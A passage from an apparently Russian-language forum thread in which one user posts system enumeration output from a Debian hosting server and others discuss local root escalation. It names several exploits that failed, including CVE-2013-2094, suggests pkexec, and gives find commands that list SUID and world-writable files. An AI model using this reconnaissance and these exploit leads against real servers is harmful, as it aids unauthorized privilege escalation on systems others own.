lrwxrwxrwx 1 root root 15 2011-09-09 14:41:54.000000000 +0300 /lib/libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 9344 2010-07-17 00:17:27.000000000 +0300 /lib/libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:54.000000000 +0300 /lib/libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 3704 2010-07-17 00:17:27.000000000 +0300 /lib/libiptc.so.0.0.0
lrwxrwxrwx 1 root root 18 2011-09-09 14:48:16.000000000 +0300 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
-rw-r--r-- 1 root root 8528 2010-04-04 01:42:19.000000000 +0300 /lib/libkeyutils.so.1.3
-rw-r--r-- 1 root root 530736 2012-02-12 22:12:39.000000000 +0300 /lib/libm-2.11.3.so
lrwxrwxrwx 1 root root 14 2012-03-15 15:31:59.000000000 +0300 /lib/libm.so.6 -> libm-2.11.3.so
-rw-r--r-- 1 root root 18760 2012-02-12 22:12:39.000000000 +0300 /lib/libmemusage.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:38.000000000 +0300 /lib/libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root 286776 2011-01-04 06:33:11.000000000 +0300 /lib/libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2011-09-09 14:41:51.000000000 +0300 /lib/libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root 338840 2011-01-04 06:33:12.000000000 +0300 /lib/libncursesw.so.5.7
-rw-r--r-- 1 root root 89064 2012-02-12 22:12:38.000000000 +0300 /lib/libnsl-2.11.3.so
lrwxrwxrwx 1 root root 16 2012-03-15 15:31:59.000000000 +0300 /lib/libnsl.so.1 -> libnsl-2.11.3.so
-rw-r--r-- 1 root root 31616 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_compat-2.11.3.so
lrwxrwxrwx 1 root root 23 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_compat.so.2 -> libnss_compat-2.11.3.so
-rw-r--r-- 1 root root 22928 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_dns-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_dns.so.2 -> libnss_dns-2.11.3.so
-rw-r--r-- 1 root root 51728 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_files-2.11.3.so
lrwxrwxrwx 1 root root 22 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_files.so.2 -> libnss_files-2.11.3.so
-rw-r--r-- 1 root root 18864 2012-02-12 22:12:39.000000000 +0300 /lib/libnss_hesiod-2.11.3.so
lrwxrwxrwx 1 root root 23 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.11.3.so
-rw-r--r-- 1 root root 43552 2012-02-12 22:12:39.000000000 +0300 /lib/libnss_nis-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_nis.so.2 -> libnss_nis-2.11.3.so
-rw-r--r-- 1 root root 51704 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_nisplus-2.11.3.so
lrwxrwxrwx 1 root root 24 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:38.000000000 +0300 /lib/libpam.so.0 -> libpam.so.0.82.2
-rw-r--r-- 1 root root 49728 2010-10-21 20:39:56.000000000 +0300 /lib/libpam.so.0.82.2
lrwxrwxrwx 1 root root 21 2011-09-09 14:41:38.000000000 +0300 /lib/libpam_misc.so.0 -> libpam_misc.so.0.82.0
-rw-r--r-- 1 root root 11016 2010-10-21 20:39:56.000000000 +0300 /lib/libpam_misc.so.0.82.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:38.000000000 +0300 /lib/libpamc.so.0 -> libpamc.so.0.82.1
-rw-r--r-- 1 root root 11592 2010-10-21 20:39:56.000000000 +0300 /lib/libpamc.so.0.82.1
-rw-r--r-- 1 root root 6272 2012-02-12 22:12:38.000000000 +0300 /lib/libpcprofile.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:48:19.000000000 +0300 /lib/libpcre.so.3 -> libpcre.so.3.12.1
-rw-r--r-- 1 root root 198176 2010-07-31 23:45:45.000000000 +0300 /lib/libpcre.so.3.12.1
lrwxrwxrwx 1 root root 18 2012-03-15 15:33:13.000000000 +0300 /lib/libpng12.so.0 -> libpng12.so.0.44.0
-rw-r--r-- 1 root root 155360 2012-02-15 21:09:53.000000000 +0300 /lib/libpng12.so.0.44.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:54.000000000 +0300 /lib/libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 46848 2010-05-13 07:40:24.000000000 +0300 /lib/libpopt.so.0.0.0
-rw-r--r-- 1 root root 75088 2010-05-04 14:26:22.000000000 +0300 /lib/libproc-3.2.8.so
-rwxr-xr-x 1 root root 131258 2012-02-12 22:12:41.000000000 +0300 /lib/libpthread-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libpthread.so.0 -> libpthread-2.11.3.so
lrwxrwxrwx 1 root root 18 2011-09-09 14:48:16.000000000 +0300 /lib/libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 258088 2009-11-02 04:59:32.000000000 +0300 /lib/libreadline.so.5.2
lrwxrwxrwx 1 root root 18 2011-09-09 14:41:51.000000000 +0300 /lib/libreadline.so.6 -> libreadline.so.6.1
-rw-r--r-- 1 root root 273840 2010-05-30 22:09:22.000000000 +0300 /lib/libreadline.so.6.1
-rw-r--r-- 1 root root 80712 2012-02-12 22:12:38.000000000 +0300 /lib/libresolv-2.11.3.so
lrwxrwxrwx 1 root root 19 2012-03-15 15:31:59.000000000 +0300 /lib/libresolv.so.2 -> libresolv-2.11.3.so
-rw-r--r-- 1 root root 31744 2012-02-12 22:12:38.000000000 +0300 /lib/librt-2.11.3.so
lrwxrwxrwx 1 root root 15 2012-03-15 15:31:59.000000000 +0300 /lib/librt.so.1 -> librt-2.11.3.so
-rw-r--r-- 1 root root 117848 2010-07-21 09:30:01.000000000 +0300 /lib/libselinux.so.1
-rw-r--r-- 1 root root 241880 2010-05-26 07:56:04.000000000 +0300 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:40.000000000 +0300 /lib/libslang.so.2 -> libslang.so.2.2.2
-rw-r--r-- 1 root root 1077912 2010-03-18 22:08:06.000000000 +0300 /lib/libslang.so.2.2.2
lrwxrwxrwx 1 root root 12 2011-09-09 14:41:40.000000000 +0300 /lib/libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 24496 2011-06-20 05:54:17.000000000 +0300 /lib/libss.so.2.0
-rw-r--r-- 1 root root 31472 2012-02-12 22:12:38.000000000 +0300 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2012-03-15 15:31:59.000000000 +0300 /lib/libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2011-09-09 14:41:38.000000000 +0300 /lib/libtic.so.5 -> libtic.so.5.7
-rw-r--r-- 1 root root 54176 2011-01-04 06:33:11.000000000 +0300 /lib/libtic.so.5.7
lrwxrwxrwx 1 root root 14 2011-09-09 14:41:51.000000000 +0300 /lib/libticw.so.5 -> libticw.so.5.7
-rw-r--r-- 1 root root 54144 2011-01-04 06:33:12.000000000 +0300 /lib/libticw.so.5.7
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:55.000000000 +0300 /lib/libudev.so.0 -> libudev.so.0.9.3
-rw-r--r-- 1 root root 55136 2010-12-13 05:56:22.000000000 +0300 /lib/libudev.so.0.9.3
lrwxrwxrwx 1 root root 19 2011-09-09 14:41:51.000000000 +0300 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 32760 2010-09-01 01:06:36.000000000 +0300 /lib/libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 10648 2012-02-12 22:12:38.000000000 +0300 /lib/libutil-2.11.3.so
lrwxrwxrwx 1 root root 17 2012-03-15 15:31:59.000000000 +0300 /lib/libutil.so.1 -> libutil-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:38.000000000 +0300 /lib/libuuid.so.1 -> libuuid.so.1.3.0
-rw-r--r-- 1 root root 15720 2011-01-25 22:17:01.000000000 +0300 /lib/libuuid.so.1.3.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:48:23.000000000 +0300 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 36360 2010-05-23 18:52:55.000000000 +0300 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root 19 2011-09-09 14:41:54.000000000 +0300 /lib/libxtables.so.4 -> libxtables.so.4.0.0
-rw-r--r-- 1 root root 32136 2010-07-17 00:17:27.000000000 +0300 /lib/libxtables.so.4.0.0
$ mount
/dev/vda1 on / type ext3 (rw,grpquota,errors=remount-ro,usrquota)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/vda3 on /data type ext3 (rw)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/vda1 4.7G 1.9G 2.6G 43% /
tmpfs 1007M 0 1007M 0% /lib/init/rw
udev 1002M 120K 1002M 1% /dev
tmpfs 1007M 0 1007M 0% /dev/shm
/dev/vda3 94G 40G 50G 45% /data
$ cat /etc/issue
Debian GNU/Linux 6.0 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version
Linux version 2.6.32-5-amd64 (Debian 2.6.32-35squeeze2) (dannf@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Fri Sep 9 20:23:16 UTC 2011
$ cat /proc/sys/vm/mmap_min_addr
65536
$ pwd
/lib
$ ls -la /usr/bin/staprun

YaBtr

11.11.2014, 18:09

Br@!ns said:

HTML:
$ uname -a
Linux hosting3 2.6.32-5-amd64 #1 SMP Fri Sep 9 20:23:16 UTC 2011 x86_64 GNU/Linux
$ ls -la /boot
total 13156
drwxr-xr-x 3 root root 4096 Sep 30 2011 .
drwxr-xr-x 22 root root 4096 Jul 9 09:50 ..
-rw-r--r-- 1 root root 1662623 Sep 10 2011 System.map-2.6.32-5-amd64
-rw-r--r-- 1 root root 106153 Sep 10 2011 config-2.6.32-5-amd64
drwxr-xr-x 3 root root 4096 Sep 30 2011 grub
-rw-r--r-- 1 root root 9238156 Sep 30 2011 initrd.img-2.6.32-5-amd64
-rw-r--r-- 1 root root 2419200 Sep 10 2011 vmlinuz-2.6.32-5-amd64
$ ls -la --full-time /lib/lib*
-rw-r--r-- 1 root root 6264 2012-02-12 22:12:38.000000000 +0300 /lib/libBrokenLocale-2.11.3.so
lrwxrwxrwx 1 root root 25 2012-03-15 15:31:59.000000000 +0300 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.11.3.so
-rw-r--r-- 1 root root 18680 2012-02-12 22:12:38.000000000 +0300 /lib/libSegFault.so
lrwxrwxrwx 1 root root 15 2011-09-09 14:41:33.000000000 +0300 /lib/libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 30408 2010-09-21 10:38:59.000000000 +0300 /lib/libacl.so.1.1.0
-rw-r--r-- 1 root root 14920 2012-02-12 22:12:38.000000000 +0300 /lib/libanl-2.11.3.so
lrwxrwxrwx 1 root root 16 2012-03-15 15:31:59.000000000 +0300 /lib/libanl.so.1 -> libanl-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:33.000000000 +0300 /lib/libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 17608 2010-06-08 08:47:32.000000000 +0300 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2013-02-25 15:50:14.000000000 +0300 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rw-r--r-- 1 root root 104808 2010-06-18 17:24:53.000000000 +0300 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2013-02-25 15:50:14.000000000 +0300 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rw-r--r-- 1 root root 55760 2010-06-18 17:24:53.000000000 +0300 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:39.000000000 +0300 /lib/libblkid.so.1 -> libblkid.so.1.1.0
-rw-r--r-- 1 root root 128256 2011-01-25 22:17:01.000000000 +0300 /lib/libblkid.so.1.1.0
lrwxrwxrwx 1 root root 15 2011-09-09 14:48:21.000000000 +0300 /lib/libbsd.so.0 -> libbsd.so.0.2.0
-rw-r--r-- 1 root root 40104 2010-01-11 17:49:56.000000000 +0300 /lib/libbsd.so.0.2.0
lrwxrwxrwx 1 root root 15 2012-10-18 11:55:31.000000000 +0300 /lib/libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2012-10-18 11:55:31.000000000 +0300 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66944 2011-12-26 16:01:14.000000000 +0300 /lib/libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1437064 2012-02-12 22:12:38.000000000 +0300 /lib/libc-2.11.3.so
lrwxrwxrwx 1 root root 14 2012-03-15 15:31:59.000000000 +0300 /lib/libc.so.6 -> libc-2.11.3.so
lrwxrwxrwx 1 root root 14 2011-09-09 14:48:16.000000000 +0300 /lib/libcap.so.2 -> libcap.so.2.19
-rw-r--r-- 1 root root 16640 2010-08-17 00:17:36.000000000 +0300 /lib/libcap.so.2.19
-rw-r--r-- 1 root root 190840 2012-02-12 22:12:39.000000000 +0300 /lib/libcidn-2.11.3.so
lrwxrwxrwx 1 root root 17 2012-03-15 15:31:59.000000000 +0300 /lib/libcidn.so.1 -> libcidn-2.11.3.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:39.000000000 +0300 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 12336 2011-06-20 05:54:17.000000000 +0300 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root 35104 2012-02-12 22:12:38.000000000 +0300 /lib/libcrypt-2.11.3.so
lrwxrwxrwx 1 root root 18 2012-03-15 15:31:59.000000000 +0300 /lib/libcrypt.so.1 -> libcrypt-2.11.3.so
lrwxrwxrwx 1 root root 18 2012-03-15 15:33:52.000000000 +0300 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rw-r--r-- 1 root root 261656 2011-06-14 23:40:36.000000000 +0300 /lib/libdbus-1.so.3.4.0
-rw-r--r-- 1 root root 139736 2011-01-23 20:36:59.000000000 +0300 /lib/libdevmapper.so.1.02.1
-rw-r--r-- 1 root root 14696 2012-02-12 22:12:39.000000000 +0300 /lib/libdl-2.11.3.so
lrwxrwxrwx 1 root root 15 2012-03-15 15:31:59.000000000 +0300 /lib/libdl.so.2 -> libdl-2.11.3.so
lrwxrwxrwx 1 root root 13 2011-09-09 14:41:40.000000000 +0300 /lib/libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 28680 2011-06-20 05:54:18.000000000 +0300 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:40.000000000 +0300 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 190000 2011-06-20 05:54:18.000000000 +0300 /lib/libext2fs.so.2.4
-rw-r--r-- 1 root root 90504 2010-11-15 05:02:27.000000000 +0300 /lib/libgcc_s.so.1
lrwxrwxrwx 1 root root 23 2012-05-29 16:12:21.000000000 +0300 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.2400.2
-rw-r--r-- 1 root root 900200 2010-09-08 22:02:05.000000000 +0300 /lib/libglib-2.0.so.0.2400.2
lrwxrwxrwx 1 root root 17 2011-09-09 14:48:16.000000000 +0300 /lib/libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 32920 2009-11-02 04:59:32.000000000 +0300 /lib/libhistory.so.5.2
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:51.000000000 +0300 /lib/libhistory.so.6 -> libhistory.so.6.1
-rw-r--r-- 1 root root 33784 2010-05-30 22:09:22.000000000 +0300 /lib/libhistory.so.6.1
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:54.000000000 +0300 /lib/libip4tc.so.0 -> libip4tc.so.0.0.0
-rw-r--r-- 1 root root 25560 2010-07-17 00:17:27.000000000 +0300 /lib/libip4tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:54.000000000 +0300 /lib/libip6tc.so.0 -> libip6tc.so.0.0.0
-rw-r--r-- 1 root root 28096 2010-07-17 00:17:27.000000000 +0300 /lib/libip6tc.so.0.0.0
lrwxrwxrwx 1 root root 15 2011-09-09 14:41:54.000000000 +0300 /lib/libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 9344 2010-07-17 00:17:27.000000000 +0300 /lib/libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:54.000000000 +0300 /lib/libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 3704 2010-07-17 00:17:27.000000000 +0300 /lib/libiptc.so.0.0.0
lrwxrwxrwx 1 root root 18 2011-09-09 14:48:16.000000000 +0300 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
-rw-r--r-- 1 root root 8528 2010-04-04 01:42:19.000000000 +0300 /lib/libkeyutils.so.1.3
-rw-r--r-- 1 root root 530736 2012-02-12 22:12:39.000000000 +0300 /lib/libm-2.11.3.so
lrwxrwxrwx 1 root root 14 2012-03-15 15:31:59.000000000 +0300 /lib/libm.so.6 -> libm-2.11.3.so
-rw-r--r-- 1 root root 18760 2012-02-12 22:12:39.000000000 +0300 /lib/libmemusage.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:38.000000000 +0300 /lib/libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root 286776 2011-01-04 06:33:11.000000000 +0300 /lib/libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2011-09-09 14:41:51.000000000 +0300 /lib/libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root 338840 2011-01-04 06:33:12.000000000 +0300 /lib/libncursesw.so.5.7
-rw-r--r-- 1 root root 89064 2012-02-12 22:12:38.000000000 +0300 /lib/libnsl-2.11.3.so
lrwxrwxrwx 1 root root 16 2012-03-15 15:31:59.000000000 +0300 /lib/libnsl.so.1 -> libnsl-2.11.3.so
-rw-r--r-- 1 root root 31616 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_compat-2.11.3.so
lrwxrwxrwx 1 root root 23 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_compat.so.2 -> libnss_compat-2.11.3.so
-rw-r--r-- 1 root root 22928 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_dns-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_dns.so.2 -> libnss_dns-2.11.3.so
-rw-r--r-- 1 root root 51728 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_files-2.11.3.so
lrwxrwxrwx 1 root root 22 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_files.so.2 -> libnss_files-2.11.3.so
-rw-r--r-- 1 root root 18864 2012-02-12 22:12:39.000000000 +0300 /lib/libnss_hesiod-2.11.3.so
lrwxrwxrwx 1 root root 23 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.11.3.so
-rw-r--r-- 1 root root 43552 2012-02-12 22:12:39.000000000 +0300 /lib/libnss_nis-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_nis.so.2 -> libnss_nis-2.11.3.so
-rw-r--r-- 1 root root 51704 2012-02-12 22:12:38.000000000 +0300 /lib/libnss_nisplus-2.11.3.so
lrwxrwxrwx 1 root root 24 2012-03-15 15:31:59.000000000 +0300 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:38.000000000 +0300 /lib/libpam.so.0 -> libpam.so.0.82.2
-rw-r--r-- 1 root root 49728 2010-10-21 20:39:56.000000000 +0300 /lib/libpam.so.0.82.2
lrwxrwxrwx 1 root root 21 2011-09-09 14:41:38.000000000 +0300 /lib/libpam_misc.so.0 -> libpam_misc.so.0.82.0
-rw-r--r-- 1 root root 11016 2010-10-21 20:39:56.000000000 +0300 /lib/libpam_misc.so.0.82.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:38.000000000 +0300 /lib/libpamc.so.0 -> libpamc.so.0.82.1
-rw-r--r-- 1 root root 11592 2010-10-21 20:39:56.000000000 +0300 /lib/libpamc.so.0.82.1
-rw-r--r-- 1 root root 6272 2012-02-12 22:12:38.000000000 +0300 /lib/libpcprofile.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:48:19.000000000 +0300 /lib/libpcre.so.3 -> libpcre.so.3.12.1
-rw-r--r-- 1 root root 198176 2010-07-31 23:45:45.000000000 +0300 /lib/libpcre.so.3.12.1
lrwxrwxrwx 1 root root 18 2012-03-15 15:33:13.000000000 +0300 /lib/libpng12.so.0 -> libpng12.so.0.44.0
-rw-r--r-- 1 root root 155360 2012-02-15 21:09:53.000000000 +0300 /lib/libpng12.so.0.44.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:54.000000000 +0300 /lib/libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 46848 2010-05-13 07:40:24.000000000 +0300 /lib/libpopt.so.0.0.0
-rw-r--r-- 1 root root 75088 2010-05-04 14:26:22.000000000 +0300 /lib/libproc-3.2.8.so
-rwxr-xr-x 1 root root 131258 2012-02-12 22:12:41.000000000 +0300 /lib/libpthread-2.11.3.so
lrwxrwxrwx 1 root root 20 2012-03-15 15:31:59.000000000 +0300 /lib/libpthread.so.0 -> libpthread-2.11.3.so
lrwxrwxrwx 1 root root 18 2011-09-09 14:48:16.000000000 +0300 /lib/libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 258088 2009-11-02 04:59:32.000000000 +0300 /lib/libreadline.so.5.2
lrwxrwxrwx 1 root root 18 2011-09-09 14:41:51.000000000 +0300 /lib/libreadline.so.6 -> libreadline.so.6.1
-rw-r--r-- 1 root root 273840 2010-05-30 22:09:22.000000000 +0300 /lib/libreadline.so.6.1
-rw-r--r-- 1 root root 80712 2012-02-12 22:12:38.000000000 +0300 /lib/libresolv-2.11.3.so
lrwxrwxrwx 1 root root 19 2012-03-15 15:31:59.000000000 +0300 /lib/libresolv.so.2 -> libresolv-2.11.3.so
-rw-r--r-- 1 root root 31744 2012-02-12 22:12:38.000000000 +0300 /lib/librt-2.11.3.so
lrwxrwxrwx 1 root root 15 2012-03-15 15:31:59.000000000 +0300 /lib/librt.so.1 -> librt-2.11.3.so
-rw-r--r-- 1 root root 117848 2010-07-21 09:30:01.000000000 +0300 /lib/libselinux.so.1
-rw-r--r-- 1 root root 241880 2010-05-26 07:56:04.000000000 +0300 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:40.000000000 +0300 /lib/libslang.so.2 -> libslang.so.2.2.2
-rw-r--r-- 1 root root 1077912 2010-03-18 22:08:06.000000000 +0300 /lib/libslang.so.2.2.2
lrwxrwxrwx 1 root root 12 2011-09-09 14:41:40.000000000 +0300 /lib/libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 24496 2011-06-20 05:54:17.000000000 +0300 /lib/libss.so.2.0
-rw-r--r-- 1 root root 31472 2012-02-12 22:12:38.000000000 +0300 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2012-03-15 15:31:59.000000000 +0300 /lib/libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2011-09-09 14:41:38.000000000 +0300 /lib/libtic.so.5 -> libtic.so.5.7
-rw-r--r-- 1 root root 54176 2011-01-04 06:33:11.000000000 +0300 /lib/libtic.so.5.7
lrwxrwxrwx 1 root root 14 2011-09-09 14:41:51.000000000 +0300 /lib/libticw.so.5 -> libticw.so.5.7
-rw-r--r-- 1 root root 54144 2011-01-04 06:33:12.000000000 +0300 /lib/libticw.so.5.7
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:55.000000000 +0300 /lib/libudev.so.0 -> libudev.so.0.9.3
-rw-r--r-- 1 root root 55136 2010-12-13 05:56:22.000000000 +0300 /lib/libudev.so.0.9.3
lrwxrwxrwx 1 root root 19 2011-09-09 14:41:51.000000000 +0300 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 32760 2010-09-01 01:06:36.000000000 +0300 /lib/libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 10648 2012-02-12 22:12:38.000000000 +0300 /lib/libutil-2.11.3.so
lrwxrwxrwx 1 root root 17 2012-03-15 15:31:59.000000000 +0300 /lib/libutil.so.1 -> libutil-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:38.000000000 +0300 /lib/libuuid.so.1 -> libuuid.so.1.3.0
-rw-r--r-- 1 root root 15720 2011-01-25 22:17:01.000000000 +0300 /lib/libuuid.so.1.3.0
lrwxrwxrwx 1 root root 16 2011-09-09 14:48:23.000000000 +0300 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 36360 2010-05-23 18:52:55.000000000 +0300 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root 19 2011-09-09 14:41:54.000000000 +0300 /lib/libxtables.so.4 -> libxtables.so.4.0.0
-rw-r--r-- 1 root root 32136 2010-07-17 00:17:27.000000000 +0300 /lib/libxtables.so.4.0.0
$ mount
/dev/vda1 on / type ext3 (rw,grpquota,errors=remount-ro,usrquota)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/vda3 on /data type ext3 (rw)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/vda1 4.7G 1.9G 2.6G 43% /
tmpfs 1007M 0 1007M 0% /lib/init/rw
udev 1002M 120K 1002M 1% /dev
tmpfs 1007M 0 1007M 0% /dev/shm
/dev/vda3 94G 40G 50G 45% /data
$ cat /etc/issue
Debian GNU/Linux 6.0 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version
Linux version 2.6.32-5-amd64 (Debian 2.6.32-35squeeze2) (dannf@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Fri Sep 9 20:23:16 UTC 2011
$ cat /proc/sys/vm/mmap_min_addr
65536
$ pwd
/lib
$ ls -la /usr/bin/staprun

Читаем первый пост!

Что Вы опробовали?

Br@!ns

11.11.2014, 18:38

YaBtr said:
Читаем первый пост!
Что Вы опробовали?

enlightenment

exploit-db.com/exploits/26368

exploit-db.com/exploits/18411

CVE-2013-2094

ничего не берет, на последнем sheep: Assertion `!close(fd)' failed.

YaBtr

11.11.2014, 18:45

Br@!ns said:
enlightenment
exploit-db.com/exploits/26368
exploit-db.com/exploits/18411
CVE-2013-2094
ничего не берет, на последнем sheep: Assertion `!close(fd)' failed.

Пооробуйте pkexec.

Что выдают команды:

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
find / -perm -a+w -type f -ls 2>/dev/null

Br@!ns

11.11.2014, 19:06

HTML:
$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 94992 Aug 27 2010 /sbin/mount.nfs
-rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
